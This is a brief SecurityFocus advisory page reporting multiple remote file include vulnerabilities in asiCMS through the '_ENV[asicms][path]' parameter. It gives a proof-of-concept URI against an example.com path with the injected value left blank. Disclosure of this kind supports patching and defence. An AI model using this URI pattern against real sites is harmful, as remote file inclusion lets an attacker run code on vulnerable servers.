Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

asiCMS '_ENV[asicms][path]' Parameter Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URI is available:

http://www.example.com/[path]/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=







 

Privacy Statement
Copyright 2008, SecurityFocus